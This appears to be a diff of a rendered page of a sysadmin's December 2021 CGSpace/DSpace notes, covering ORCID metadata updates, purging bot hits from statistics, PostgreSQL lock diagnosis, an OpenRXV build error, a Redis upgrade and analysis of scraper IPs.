$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-11-30-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Liaqat, U.W.&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
</span></span><span style="display:flex;"><span>&#34;Liaqat, Umar Waqas&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
</span></span><span style="display:flex;"><span>&#34;Munyaradzi, M.&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
</span></span><span style="display:flex;"><span>&#34;Mutenje, Munyaradzi&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
</span></span><span style="display:flex;"><span>&#34;Rex, William&#34;,&#34;William Rex: 0000-0003-4979-5257&#34;
</span></span><span style="display:flex;"><span>&#34;Shrestha, Shisher&#34;,&#34;Nirman Shrestha: 0000-0002-0996-8611&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><!-- raw HTML omitted -->

- Atmire merged some changes I had submitted to the COUNTER-Robots project
- I updated our local spider user agents and then re-ran the list with my `check-spider-hits.sh` script on CGSpace:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</code></pre></div><h2 id="2021-12-02">2021-12-02</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</span></span></code></pre></div><h2 id="2021-12-02">2021-12-02</h2>
- Francesca from the Alliance asked me for help with approving a submission that gets stuck
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (1437 rows)
1 application_name
9 psql
1428 dspaceWeb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (1437 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 1428 dspaceWeb
</span></span></code></pre></div><ul>
- Munin shows the same:

![PostgreSQL locks week](/cgspace-notes/2021/12/postgres_locks_ALL-week.png)

- Last month I enabled `log_lock_waits` in PostgreSQL, so I checked the log and was surprised to find only a few lock waits since I restarted PostgreSQL three days ago:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grep -E <span style="color:#e6db74">&#39;^2021-(11-29|11-30|12-01|12-02)&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
15
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -E <span style="color:#e6db74">&#39;^2021-(11-29|11-30|12-01|12-02)&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
</span></span><span style="display:flex;"><span>15
</span></span></code></pre></div><ul>
- I think you could analyze the locks held by the dspaceWeb user (XMLUI) and find out which queries are holding them… but it's so much information and I don't know where to start (one possible starting point is sketched below)
  - For now I just restarted PostgreSQL…
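A sketch of one such starting point, grouping the currently held locks by the query that holds them (an assumption about a useful first cut, not something I actually ran):

```console
$ psql -c "SELECT psa.query, count(*) FROM pg_locks pl JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE psa.application_name = 'dspaceWeb' GROUP BY psa.query ORDER BY count(*) DESC LIMIT 10;"
```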
- I noticed a strange user agent in the XMLUI logs on CGSpace:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] &#34;GET /handle/10568/33203 HTTP/1.1&#34; 200 6328 &#34;-&#34; &#34;python-requests/2.25.1&#34;
20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] &#34;GET /handle/10568/33203 HTTP/2.0&#34; 200 6315 &#34;-&#34; &#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] &#34;GET /handle/10568/33203 HTTP/1.1&#34; 200 6328 &#34;-&#34; &#34;python-requests/2.25.1&#34;
</span></span><span style="display:flex;"><span>20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] &#34;GET /handle/10568/33203 HTTP/2.0&#34; 200 6315 &#34;-&#34; &#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36&#34;
</span></span></code></pre></div><ul>
- I looked into it more and I see a dozen other IPs using that user agent, and they are all owned by Microsoft
  - It could be someone on Azure?
- I purged 34,000 hits from this user agent in our Solr statistics:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 34458 hits from HeadlessChrome in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 34458
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 34458 hits from HeadlessChrome in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 34458
</span></span></code></pre></div><ul>
<li>Meeting with partners about repositories in the One CGIAR</li>
</ul>
<h2 id="2021-12-08">2021-12-08</h2>
@ -307,26 +307,26 @@ Purging 34458 hits from HeadlessChrome in statistics
<ul>
<li>I finally caught some stuck locks on CGSpace after checking several times per day for the last week:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
1508
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
</span></span><span style="display:flex;"><span>1508
</span></span></code></pre></div><ul>
<li>Now looking at the locks query sorting by age of locks:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat locks-age.sql
SELECT a.datname,
l.relation::regclass,
l.transactionid,
l.mode,
l.GRANTED,
a.usename,
a.query,
a.query_start,
age(now(), a.query_start) AS &#34;age&#34;,
a.pid
FROM pg_stat_activity a
JOIN pg_locks l ON l.pid = a.pid
ORDER BY a.query_start;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat locks-age.sql
</span></span><span style="display:flex;"><span>SELECT a.datname,
</span></span><span style="display:flex;"><span> l.relation::regclass,
</span></span><span style="display:flex;"><span> l.transactionid,
</span></span><span style="display:flex;"><span> l.mode,
</span></span><span style="display:flex;"><span> l.GRANTED,
</span></span><span style="display:flex;"><span> a.usename,
</span></span><span style="display:flex;"><span> a.query,
</span></span><span style="display:flex;"><span> a.query_start,
</span></span><span style="display:flex;"><span> age(now(), a.query_start) AS &#34;age&#34;,
</span></span><span style="display:flex;"><span> a.pid
</span></span><span style="display:flex;"><span>FROM pg_stat_activity a
</span></span><span style="display:flex;"><span>JOIN pg_locks l ON l.pid = a.pid
</span></span><span style="display:flex;"><span>ORDER BY a.query_start;
</span></span></code></pre></div><ul>
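<li>(A query like this can be kept in a file and run with <code>psql dspace -f locks-age.sql</code>; the output is very wide, so piping it to <code>less -S</code> helps)</li>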
<li>The oldest locks are 9 hours and 26 minutes old and the time on the server is <code>Tue Dec 14 18:41:58 CET 2021</code>, so it seems something happened around 9:15 this morning
<ul>
<li>I looked at the maintenance tasks and there is nothing running around then (only the sitemap update that runs at 8AM, and should be quick)</li>
@ -354,25 +354,25 @@ ORDER BY a.query_start;
</li>
<li>I created a SAF archive with SAFBuilder and then imported it to DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2021-12-16-green-covers.map
</code></pre></div><h2 id="2021-12-19">2021-12-19</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2021-12-16-green-covers.map
</span></span></code></pre></div><h2 id="2021-12-19">2021-12-19</h2>
<ul>
<li>I tried to update all Docker containers on AReS and then run a build, but I got an error in the backend:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">&gt; openrxv-backend@0.0.1 build
&gt; nest build
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
~~~~~~~~~~~~~~~~~~~~~
node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&gt; openrxv-backend@0.0.1 build
</span></span><span style="display:flex;"><span>&gt; nest build
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
</span></span><span style="display:flex;"><span> ~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span>node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
</span></span><span style="display:flex;"><span> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
</span></span></code></pre></div><ul>
<li>I&rsquo;m not sure why because I build the backend successfully on my local machine&hellip;
<ul>
<li>For now I just ran all the system updates and rebooted the machine (linode20)</li>
@ -389,39 +389,39 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
</li>
<li>But since software sucks, now I get an error in the frontend while starting nginx:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">nginx: [emerg] host not found in upstream &#34;backend:3000&#34; in /etc/nginx/conf.d/default.conf:2
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>nginx: [emerg] host not found in upstream &#34;backend:3000&#34; in /etc/nginx/conf.d/default.conf:2
</span></span></code></pre></div><ul>
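<li>That error usually means nginx started before the <code>backend</code> container was up (or they aren&rsquo;t on the same Docker network), so the name didn&rsquo;t resolve; a quick sanity check would be something like this, assuming the compose project is named <code>openrxv</code>:</li>
</ul>
<pre tabindex="0"><code>$ docker ps --filter name=backend
$ docker network inspect openrxv_default | grep -A 2 backend
</code></pre><ul>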
<li>In other news, looking at updating our Redis from version 5 to 6 (which is slightly less old, but still old!) and I&rsquo;m happy to see that the <a href="https://raw.githubusercontent.com/redis/redis/6.0/00-RELEASENOTES">release notes for version 6</a> say that it is compatible with 5 except for one minor thing that we don&rsquo;t seem to be using (SPOP?)</li>
<li>For reference I see that our Redis 5 container is based on Debian 11, which I didn&rsquo;t expect&hellip; but I still want to try to upgrade to Redis 6 eventually:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker exec -it redis bash
root@23692d6b51c5:/data# cat /etc/os-release
PRETTY_NAME=&#34;Debian GNU/Linux 11 (bullseye)&#34;
NAME=&#34;Debian GNU/Linux&#34;
VERSION_ID=&#34;11&#34;
VERSION=&#34;11 (bullseye)&#34;
VERSION_CODENAME=bullseye
ID=debian
HOME_URL=&#34;https://www.debian.org/&#34;
SUPPORT_URL=&#34;https://www.debian.org/support&#34;
BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker exec -it redis bash
</span></span><span style="display:flex;"><span>root@23692d6b51c5:/data# cat /etc/os-release
</span></span><span style="display:flex;"><span>PRETTY_NAME=&#34;Debian GNU/Linux 11 (bullseye)&#34;
</span></span><span style="display:flex;"><span>NAME=&#34;Debian GNU/Linux&#34;
</span></span><span style="display:flex;"><span>VERSION_ID=&#34;11&#34;
</span></span><span style="display:flex;"><span>VERSION=&#34;11 (bullseye)&#34;
</span></span><span style="display:flex;"><span>VERSION_CODENAME=bullseye
</span></span><span style="display:flex;"><span>ID=debian
</span></span><span style="display:flex;"><span>HOME_URL=&#34;https://www.debian.org/&#34;
</span></span><span style="display:flex;"><span>SUPPORT_URL=&#34;https://www.debian.org/support&#34;
</span></span><span style="display:flex;"><span>BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
</span></span></code></pre></div><ul>
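<li>Bumping it should just be a matter of changing the image tag in the compose file, something like this sketch (assuming the service currently pins <code>redis:5</code> in <code>docker-compose.yml</code>):</li>
</ul>
<pre tabindex="0"><code>  redis:
    image: redis:6
</code></pre><ul>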
<li>I bumped the version to 6 on my local test machine and the logs look good:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker logs redis
1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
1:M 19 Dec 2021 19:27:15.584 # Server initialized
1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker logs redis
</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 # Server initialized
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
</span></span></code></pre></div><ul>
<li>The interface and harvesting all work as expected&hellip;
<ul>
<li>I pushed the update to OpenRXV</li>
@ -443,8 +443,8 @@ BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
<li>Move invalid AGROVOC subjects in Gaia&rsquo;s eighteen green cover items on DSpace Test to <code>cg.subject.system</code></li>
<li>I created an &ldquo;approve&rdquo; user for Rafael from CIAT to do tests on DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">&#39;fuuuuuu&#39;</span>
</code></pre></div><h2 id="2021-12-27">2021-12-27</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">&#39;fuuuuuu&#39;</span>
</span></span></code></pre></div><h2 id="2021-12-27">2021-12-27</h2>
<ul>
<li>Start a fresh harvest on AReS</li>
</ul>
@ -452,8 +452,8 @@ BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
<ul>
<li>Looking at the top IPs and user agents on CGSpace&rsquo;s Solr statistics I see a strange user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
</span></span></code></pre></div><ul>
<li>I found two IPs using user agents with the &ldquo;randint&rdquo; bug (presumably a scraper that forgot the <code>f</code> prefix on a Python f-string, so the <code>{random.randint(...)}</code> template is sent literally instead of being evaluated):
<ul>
<li>47.252.80.214 (AliCloud in the US)</li>
@ -469,26 +469,26 @@ BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
</li>
<li>3.225.28.105 is on Amazon and making thousands of requests for the same URL:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">/rest/collections/1118/items?expand=all&amp;limit=1
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>/rest/collections/1118/items?expand=all&amp;limit=1
</span></span></code></pre></div><ul>
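<li>(<code>expand=all</code> tells the DSpace REST API to serialize all of an item&rsquo;s sub-resources, so repeating that request thousands of times is expensive even with <code>limit=1</code>)</li>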
<li>Most of the time it has a real-looking user agent, but sometimes it uses <code>Apache-HttpClient/4.3.4 (java 1.5)</code></li>
<li>Another IP, 82.65.26.228, is doing SQL injection attempts from France</li>
<li>216.213.28.138 is some scrape-as-a-service bot from Sprious</li>
<li>I used my <code>resolve-addresses-geoip2.py</code> script to get the ASNs for all the IPs in Solr stats this month, then extracted the ASNs that were responsible for more than one IP:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk <span style="color:#e6db74">&#39;$1 &gt; 1&#39;</span>
2 10620
2 265696
2 6147
2 9299
3 3269
5 16509
5 49505
9 24757
9 24940
9 64267
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
</span></span><span style="display:flex;"><span>$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk <span style="color:#e6db74">&#39;$1 &gt; 1&#39;</span>
</span></span><span style="display:flex;"><span> 2 10620
</span></span><span style="display:flex;"><span> 2 265696
</span></span><span style="display:flex;"><span> 2 6147
</span></span><span style="display:flex;"><span> 2 9299
</span></span><span style="display:flex;"><span> 3 3269
</span></span><span style="display:flex;"><span> 5 16509
</span></span><span style="display:flex;"><span> 5 49505
</span></span><span style="display:flex;"><span> 9 24757
</span></span><span style="display:flex;"><span> 9 24940
</span></span><span style="display:flex;"><span> 9 64267
</span></span></code></pre></div><ul>
<li>AS 64267 is Sprious, and it has used these IPs this month:
<ul>
<li>216.213.28.136</li>
@ -526,37 +526,37 @@ $ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | aw
</li>
<li>I ran the script to purge spider agents with the latest updates:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 2530 hits from HeadlessChrome in statistics
Purging 10676 hits from randint in statistics
Purging 3579 hits from Koha in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 16785
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 2530 hits from HeadlessChrome in statistics
</span></span><span style="display:flex;"><span>Purging 10676 hits from randint in statistics
</span></span><span style="display:flex;"><span>Purging 3579 hits from Koha in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 16785
</span></span></code></pre></div><ul>
<li>Then the IPs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
